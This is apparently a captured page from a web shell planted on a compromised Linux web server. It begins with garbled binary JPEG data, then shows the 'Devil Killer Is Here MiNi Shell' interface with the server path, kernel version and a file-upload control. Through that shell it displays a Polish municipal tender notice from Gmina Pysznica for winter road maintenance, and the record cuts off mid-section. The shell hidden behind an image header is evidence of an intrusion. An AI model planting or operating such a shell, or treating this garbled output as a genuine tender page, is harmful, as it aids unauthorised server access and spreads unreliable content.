JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251024/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251024/0049625201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przedmiotem zamówienia jest usługa polegająca na kompleksowym zimowym utrzymaniem dróg i chodników na terenie Gminy Pysznica w sezonie zimowym 2025/2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PYSZNICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409117</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wolności 322</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pysznica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-403</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">15 841 01 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mmajewska@pysznica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pysznica.bip.gmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na kompleksowym zimowym utrzymaniem dróg i chodników na terenie Gminy Pysznica w sezonie zimowym 2025/2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f7ce92e5-1be2-4124-8673-f54b4a1554ea</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00496252</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pysznica.ezamawiajacy.pl/pn/PYSZNICA/demand/242907/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pysznica.ezamawiajacy.pl/pn/PYSZNICA/demand/242907/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu Platformy zakupowej: <br/>https://pysznica.ezamawiajacy.pl, w szczególnie uzasadnionych przypadkach <br/>uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem <br/>Platformy Zakupowej, Zamawiający dopuszcza komunikację za pomocą poczty <br/>elektronicznej na adres e-mail: ug@pysznica.pl (nie dotyczy składania <br/>ofert/wniosków <br/>o dopuszczenie do udziału w postępowaniu).<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną <br/>do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich <br/>czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę <br/>wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym <br/>na adres email Zamawiającego przyjmuje się datę zapisu wiadomości <br/>na serwerze odbiorczym. W przypadku skorzystania z Platformy za datę <br/>wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich <br/>rejestracji na Platformie.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego, musi zalogować się do Systemu na subdomenie <br/>https://pysznica.ezamawiajacy.pl lub na https://oneplace.marketplanet.pl. Platforma <br/>jest dostępna dla każdego zalogowanego użytkownika. <br/>4. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany <br/>do strony https://oneplace.marketplanet.pl gdzie zostanie powiadomiony <br/>o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca <br/>zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, <br/>ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje <br/>regulamin, klika polecenie „zarejestruj się&#34;.<br/>15. Rejestracja Wykonawcy następuje automatycznie poprzez:<br/>a) Podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, <br/>osobistym lub profilem zaufanym), lub<br/>b) Kontakt z numerem telefonu podanym w potwierdzeniu, lub <br/>c) Jeżeli użytkownik nie podpisze się na wniosku, ani nie skontaktuje <br/>się telefonicznie, konto zostanie aktywowane w ciągu maksymalnie 6 godzin <br/>roboczych. W związku z tym Zamawiający zaleca Wykonawcom <br/>uwzględnienie czasu niezbędnego na rejestracje w procesie złożenia Oferty w <br/>postaci elektronicznej.<br/>6. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. <br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia <br/>oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem <br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje <br/>się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>7. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. <br/>Wniosek należy przesłać za pośrednictwem Platformy Zakupowej Przez opcję <br/>„zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania <br/>Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz <br/>ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić <br/>dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych <br/>pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika <br/>klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez <br/>komunikat systemowy &#34;pytanie wysłane” lub za pomocą poczty elektronicznej <br/>na adres email: ug@pysznica.pl powołując się w temacie wiadomości na numer <br/>postepowania RI.IV.271.22.2025.<br/>8. Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź <br/>informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom <br/>za pośrednictwem Platformy Zakupowej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów Rozporządzenia Parlamentu Europejskiego i Rady <br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu <br/>takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych „RODO”), informujemy o zasadach przetwarzania Pani/Pana danych osobowych <br/>oraz o przysługujących Pani/Panu prawach z tym związanych: <br/>1. Zamawiający informuje, że administratorem danych osobowych jest: Wójt Gminy <br/>Pysznica, ul. Wolności 322, 37-403 Pysznica <br/>40<br/>2. Kontakt z inspektorem ochrony danych osobowych adres e-mail: iod@pysznica.pl <br/>3. Dane osobowe będą przetwarzane zgodnie z przepisami RODO, tzn. będą przetwarzane <br/>w celu/celach przygotowania i przeprowadzenia postępowania o udzielenie zamówienia <br/>publicznego oraz realizacji tego zamówienia; <br/>4. Podstawą prawną przetwarzania danych osobowych jest ustawa z dnia 11 września 2019 <br/>roku Prawo zamówień publicznych; <br/>5. Dane osobowe będą przechowywane przez okres wynikający z przepisów prawa, <br/>w szczególności: z dnia 11 września 2019 roku Prawo zamówień publicznych, ustawy <br/>z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, rozporządzeniu <br/>Prezesa Rady Ministrów z dnia 18 stycznia 2011r. w sprawie instrukcji kancelaryjnej, <br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu <br/>działania archiwów zakładowych. <br/>6. Odbiorcami danych osobowych mogą być podmioty uprawnione na podstawie <br/>przepisów prawa w szczególności osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18, 19 oraz art. 74 i 75 ustawy z dnia 11 września <br/>2019 roku Prawo zamówień publicznych lub umowy powierzenia przetwarzania danych. <br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio <br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy <br/>Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>9. Posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy <br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO; <br/>10. Nie przysługuje Pani/Panu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.IV.271.22.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na kompleksowym zimowym utrzymaniem dróg i chodników na terenie Gminy Pysznica w sezonie zimowym 2025/2026<br/>Przedmiotem zamówienia jest usługa polegająca na kompleksowym zimowym utrzymaniem dróg i chodników na terenie Gminy Pysznica w sezonie zimowym 2025/2026, przez którą należy rozumieć:<br/>1.	odśnieżanie i zwalczanie śliskości dróg przy zastosowaniu mieszanki piaskowo-solnej o stężeniu 30% na wskazanych odcinkach dróg,<br/>2.	mechaniczne odśnieżanie oraz zwalczanie śliskości przy użyciu piasku na odcinkach ścieżek rowerowych i chodników.<br/>3.	likwidację skutków zimy, w tym żywiołu śnieżnego i niskich temperatur, poprzez zapewnienie przejezdności dróg oraz ograniczenie zakłóceń w ruchu drogowym wywołanych czynnikami atmosferycznymi; <br/>4.	prowadzenie akcji zimowej w dzień i w nocy, w dni robocze oraz święta, w różnych warunkach atmosferycznych (opady śniegu, marznącego deszczu, zawieje, zamiecie, niskie temperatury), <br/>5.	utrzymywanie w pełnej gotowości technicznej i eksploatacyjnej środków transportowych i sprzętowych wraz z osprzętem przewidzianym do zwalczania skutków zimy,<br/>6. pełnienie dyżurów oraz prowadzenie dokumentacji ZUD, w tym dziennika dyżurów zawierającego informacje o przebiegu dyżuru, stanie dróg i podjętych interwencjach, <br/>7.	szczegółowy zakres zamówienia opisano w załączniku nr 7 – opis przedmiotu zamówienia do SWZ. Wytyczne w załączniku zawarte dotyczą sposobu świadczenia usług. <br/>8.	rozpoczęcie realizacji zamówienia nastąpi z chwilą wystąpienia warunków zimowych – 15 listopad 2025 r.<br/>9.	zakończenie realizacji zamówienia nastąpi z chwilą ustąpienia warunków zimowych – 31 marzec 2026 r.-<br/>Szczegółowy opis przedmiotu został ujęty w SWZ oraz załączniku nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90600000-3 - Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-11-15 do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji w okresie prowadzonej akcji ZUD</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu na zasadach określonych w Rozdziale X SWZ, oraz spełniają <br/>określone przez Zamawiającego warunki udziału w postępowaniu. a. zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku <br/>w powyższym zakresie.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>b. kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie stawia warunku w powyższym zakresie Sytuacji ekonomicznej i <br/>finansowej<br/>c. Sytuacji ekonomicznej lub finansowej: <br/>Wykonawca spełni warunek, jeżeli:<br/>Wykaże że jest ubezpieczony od odpowiedzialności cywilnej w zakresie <br/>prowadzonej działalności związanej z przedmiotem zamówienia minimum <br/>na kwotę: 500 000,00 zł (pięćset tysięcy złotych 00/100)<br/>d.Zdolności technicznej lub zawodowej<br/>Zamawiający uzna, że Wykonawca spełni warunek, jeżeli wykaże że:<br/>a. nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej jedną usługę polegającą na zimowym utrzymaniu dróg o wartości brutto <br/>co najmniej 100 000,00 PLN (słownie: sto tysięcy złotych 00/100), w zakresie <br/>niezbędnym do wykazania doświadczenia, <br/>- wraz z podaniem rodzaju, wartości, daty i miejsca wykonania usługi oraz podmiotów, <br/>na rzecz którego usługa została wykonana, a także z załączeniem dowodów<br/><br/>potwierdzających, że usługa zostały wykonana należycie, w szczególności informacją <br/>o tym, czy usługa została wykonana zgodnie z umową.<br/> W przypadku, gdy Wykonawca polega na doświadczeniu innych <br/>podmiotów, zobowiązany jest wykazać, że będzie dysponował ich zasobami <br/>w zakresie niezbędnym do realizacji zamówienia – zgodnie z art. 118 ustawy <br/>Prawo zamówień publicznych.<br/>Przez zamówienie należy rozumieć zamówienie rozpoczęte od 15 listopada 2025r., oraz <br/>zamówienie zakończone do 31.03.2025 r.<br/>b. na czas realizacji zamówienia Wykonawca będzie dysponował potencjałem <br/>technicznym, tj.:<br/>- pojazdem mechanicznym o mocy minimum 260 KM z posypywarka i pługiem do <br/>odśnieżania – 1 sztuka<br/>- pojazdem mechanicznym z pługiem do odśnieżania – 3 sztuki<br/>Wykonawca powinien posiadać sprzęt do wykonania usługi polegającej na <br/>kompleksowym zimowym utrzymaniem dróg i chodników na terenie Gminy <br/>Pysznica: <br/>- nośniki dostosowane do sprzętu. Nośniki winny być w pełni sprawne technicznie, <br/>dopuszczone w ruchu drogowym (aktualne badania techniczne). W szczególności <br/>należy uwzględnić wyposażenie nośników w niezbędne elementy ostrzegawcze <br/>(światła błyskowe koloru pomarańczowego, itp.). <br/> - do odśnieżania i zwalczania śliskości zimowej ścieżek rowerowych i chodników <br/>Oferenci winni podstawić mechaniczny sprzęt samojezdny (sprawny technicznie) <br/>typu: ciągnik, multikar, samochód z napędem 4x4 itp., zapewniający optymalną <br/>pracę podczas przejazdu, wyposażony w pług odśnieżny, oraz posypywarkę do <br/>posypywania piaskiem / mieszanką piaskowo-solną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej <br/>oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>1.1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), <br/>załącznik nr 5 do SWZ.<br/>1.2. Wykaz usług <br/>a. nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:<br/>- co najmniej jedną usługę polegającą na zimowym utrzymaniu dróg o wartości <br/>brutto co najmniej 100 000,00 PLN (słownie: sto tysięcy złotych 00/100), w zakresie <br/>niezbędnym do wykazania doświadczenia, <br/>- wraz z podaniem rodzaju, wartości, daty i miejsca wykonania usługi oraz <br/>podmiotów, na rzecz którego usługa została wykonana, a także z załączeniem <br/>dowodów potwierdzających, że usługa zostały wykonana należycie, w szczególności <br/>informacji o tym, czy usługa została wykonana zgodnie z umową; - załącznik nr 8 do <br/>SWZ<br/> 1.3. Wykaz potencjału technicznego na czas realizacji zamówienia <br/>Wykaz potencjału technicznego – dysponowanie odpowiednim potencjałem <br/>technicznym do wykonania zamówienia; warunek ten zostanie spełniony, jeżeli <br/>Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował potencjałem <br/>technicznym tj.:<br/>- pojazdem mechanicznym o mocy minimum 260 KM z posypywarka i pługiem do <br/>odśnieżania – 1 sztuka<br/>- pojazdem mechanicznym z pługiem do odśnieżania – 3 sztuki<br/>Wykonawca powinien posiadać sprzęt do utzrymania zimowego<br/>- nośniki dostosowane do sprzętu. Nośniki winny być w pełni sprawne technicznie, <br/>dopuszczone do ruchu (aktualne badania techniczne). W szczególności należy <br/>uwzględnić wyposażenie nośników w niezbędne elementy ostrzegawcze (światła <br/>błyskowe koloru pomarańczowego, itp.). <br/> - do odśnieżania i zwalczania śliskości zimowej ścieżek rowerowych i chodników <br/>Oferenci winni podstawić mechaniczny sprzęt samojezdny (sprawny technicznie) <br/>typu: ciągnik, multikar, samochód z napędem 4x4 itp., zapewniający optymalną <br/>pracę podczas przejazdu, wyposażony w pług 